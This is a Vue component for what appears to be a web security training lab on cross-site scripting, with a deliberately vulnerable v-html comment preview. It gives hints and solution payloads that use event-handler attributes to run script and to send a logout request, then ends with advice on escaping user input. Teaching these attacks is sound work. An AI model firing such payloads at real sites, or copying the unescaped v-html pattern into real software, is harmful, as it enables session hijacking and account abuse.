<template>
    <div>
        <h1>Attack 3: XSS
            <button class="btn btn-warning" @click.prevent="increaseStep(0, true)">Force steps
                completion
            </button>
        </h1>

        <div class="row">
            <div class="col-md">
                <h2>Step 1: Login</h2>
                <step-spoiler class="mb-3" :minStep="LOGIN_STEP" :currentStep="currentStep" :autoView="true">
                    <login-portal @logged-in="increaseStep(LOGIN_STEP)"></login-portal>
                </step-spoiler>
                <h2>Step 2: Enter a comment</h2>
                <step-spoiler class="mb-3" :minStep="COMMENT_STEP" :currentStep="currentStep" :autoView="true">
                    <div class="form-group">
                        <textarea class="form-control" v-model="userInput" rows="5"></textarea>
                    </div>
                    <button class="btn btn-primary" @click.prevent="preview()">Preview</button>
                    <hr>
                    <h2>Comment preview</h2>
                    <div v-html="printedText"></div>
                </step-spoiler>
            </div>
            <div class="col-md text-justify">
                <explanation>
                    <h2>Default login credentials</h2>
                    <ul>
                        <li>Username: JohnDoe</li>
                        <li>Password: foobar</li>
                    </ul>
                    <h2>Directions</h2>
                    <ol>
                        <li>
                            Display a picture of a red panda in the preview.
                            <br>(You might want to test a CSRF attack).
                        </li>
                        <li>
                            Print "Hello!" using JavaScript
                            <br><strong>Note</strong>: &lt;script&gt; tags don't work.
                        </li>
                        <li>
                            Insert a script which disconnects the user. You can check user disconnection
                            using "Refresh login portal" link.
                        </li>
                    </ol>
                    <h2>Hints</h2>
                    <h3>Exercise 1</h3>
                    <step-spoiler class="mb-2" :minStep="-1" :currentStep="0">
                        <p>
                            Just write some HTML code in the text field.
                        </p>
                    </step-spoiler>
                    <h3>Exercise 2</h3>
                    <step-spoiler class="mb-2" :minStep="-1" :currentStep="0">
                        <p>
                            The script tag isn't working, but that's not the only way to execute JavaScript on a
                            website. Here is something you might want to checkout: <code>javascript onload</code>.
                        </p>
                    </step-spoiler>
                    <h3>Exercise 3</h3>
                    <step-spoiler class="mb-2" :minStep="-1" :currentStep="0">
                        <p>
                            Now that you know how to execute JavaScript code, you have to find how to send a HTTP GET
                            request. Here is something you might want to checkout: <code>XMLHttpRequest</code>.
                        </p>
                    </step-spoiler>
                    <h2>Solutions</h2>
                    <h3>Exercise 1</h3>
                    <step-spoiler class="mb-2" :minStep="-1" :currentStep="0">
                            <code>&lt;img src="/img/red_panda.jpg" /&gt;</code>
                    </step-spoiler>
                    <h3>Exercise 2</h3>
                    <step-spoiler class="mb-2" :minStep="-1" :currentStep="0">
                        <code>&lt;a href="" onmouseover="alert('Hello !');"&gt;Over Here&lt;/a&gt;</code>
                    </step-spoiler>
                    <h3>Exercise 3</h3>
                    <step-spoiler class="mb-2" :minStep="-1" :currentStep="0">
                        <pre>&lt;a href="" onmouseover="var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:3000/user/logout', true); // ou false
xhr.send();alert('Disconnecting...');"&gt;Over Here&lt;/a&gt;</pre>
                    </step-spoiler>
                    <h2>How can I protect myself from these kind of attacks?</h2>
                    <p>
                        There isn't much you can do. It is mainly webmaster roles to protect their website
                        against XSS injections (see below). The only thing you could do against them is to
                        disable JavaScript on your browser, but that's not very convenient.
                    </p>
                    <h2>
                        Can you guess how to protect your website?
                    </h2>
                    <step-spoiler class="mb-3" :minStep="EXPLANATION_STEP" :currentStep="currentStep" :autoView="false">
                        <ul>
                            <li>
                                The main prevention against XSS is to escape every data originating from users you put
                                on your website. For our example, we used the <code>v-html</code> NodeJS attribute,
                                which inject HTML code right on the website (ooh, bad!). <strong>Never forger:
                                your users are evil and cannot be trusted</strong>.
                            </li>
                            <li>
                                You can checkout the
                                <a href="https://en.wikipedia.org/wiki/Cross-site_scripting">Wikipedia
                                    article about XSS</a> to learn more about it.
                            </li>
                        </ul>
                    </step-spoiler>
                </explanation>
            </div>
        </div>
    </div>
</template>

<script lang="ts">
    import Vue from "vue";
    import {Component} from "vue-property-decorator";

    import LoginPortal from '../common/LoginPortal.vue';
    import StepSpoiler from '../common/StepSpoiler.vue';
    import Explanation from '../common/Explanation.vue';

    @Component({
        components: {
            StepSpoiler,
            LoginPortal,
            Explanation
        }
    })
    export default class XSS extends Vue {
        userInput: string   = "Insert some text here...";
        printedText: string = "";

        currentStep: number = 1;

        readonly LOGIN_STEP   = 1;
        readonly COMMENT_STEP = 2;

        mounted() {
            document.title = "Third attack: XSS";
        }

        preview() {
            this.printedText = this.userInput;
        }

        increaseStep(stepLimit: number, force: boolean = false) {
            if (this.currentStep <= stepLimit || force) {
                this.currentStep++;
            }
        }

    }
</script>

<style scoped>

</style>